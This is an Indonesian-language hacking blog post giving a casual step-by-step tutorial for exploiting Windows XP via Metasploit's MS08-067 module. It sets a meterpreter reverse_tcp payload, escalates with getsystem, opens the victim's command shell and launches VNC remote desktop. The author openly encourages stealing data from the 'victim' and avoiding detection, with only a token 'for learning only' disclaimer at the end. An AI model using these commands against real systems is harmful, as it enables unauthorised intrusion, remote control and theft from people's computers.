Exploit Windows XP With Metasploit

Setelah muka kaya orang belum makan 2 hari, rambut kaya grandong karena kecapean ane putusin buat tidur. Dan setelah bangun dari tidur yang nimat tadi, akhirnya kembali lagi dah muka ganteng ane. Hahaha... Dirumah jenuh nggak ada kerjaan lebih baik ngeblog aja iseng share ilmu siapa tahu bermanfaat buat agan-agan pembaca. Post kali ini akan ane share tutorial buat exploit windows XP yang udah mau kiamat. Exploit yang saya share ini menggunakan metasploit, tools dewa yang udah ada dalam om naga. 

Sekarang waktunya praktek. Simak sendiri terus pratekin aja bro.

Buka terminal terus buka metasploit agan.

root@kurawa:~# msfconsole 

Tunggu gan sabar, agak lama emang kalo buka metasploit. Nah nongol tuh punya ane.

Terus gunakan exploit ini gan

msf > use exploit/windows/smb/ms08_067_netapi 

Sekarang set payload nya. Pake ini gan.

msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

Exploit dan Payload udah diset sekarang kita liat opsi apa yang harus diisi.

msf  exploit(ms08_067_netapi) > show options

Keluar tuh opsi-opsi yang harus diisi. Keterangan buat ngisinya kaya gini

RHOST - isi dengan IP target

RPORT - isi dengan port target 

LHOST - isi dengan IP kita

LPORT - isi dengan port kita

Jadi nanti kaya penampakan dibawah ini

Kalo standardnya RPORT 445 dan LPORT 4444. Ane gunain standar bawaannya aja. Kalo udah diisi semua sekarang tinggal eksekusi target wedus XP.

msf  exploit(ms08_067_netapi) > exploit

Mantap!! Langsung tembus  (ditandai dengan munculnya session meterpreter).

Sekarang kita ambil alih system target yang udah berubah status jadi korban. Hahaha.. Ane susul dengan command buat liat siapa kita. Ane juga liat dimana posisi ane. 

meterpreter > getsystem 

meterpreter > getuid

meterpreter > pwd

Posisi ane udah di system 32 korban. Sekarang ane mau masuk ke shell milik korban.

meterpreter > shell

Bless... masuk dah di cmd korban

Terserah ente mau diapain tuh kompi korban, mau shut down, remote dekstop atau sekedar jalan-jalan buat liat isi file korban, atau bahkan nyolong data terserah agan. Anggap aja itu mesin punya agan. Hahaha...

Ane udah bilang diatas terserah agan mau diapain ( mau shut down, remote dekstop atau sekedar jalan-jalan buat liat isi file korban, atau bahkan nyolong data ). Tapi ane yakin ente bakal paling ngebet buat ngincer yang satu ini 'REMOTE DESKTOP'.

meterpreter > run vnc

Mantap jilid 2, langsung ke remote mesin korban.

Pesan ane satu pasang muka bego agan biar kagak ketahuan. Hahaha..

Sekian post kali ini semoga bermanfaat. Ini cuma sebagai pembelajaran saja, ane nggak tanggung jawab kalo ada apa-apa. Kembali pada diri agan. Salam.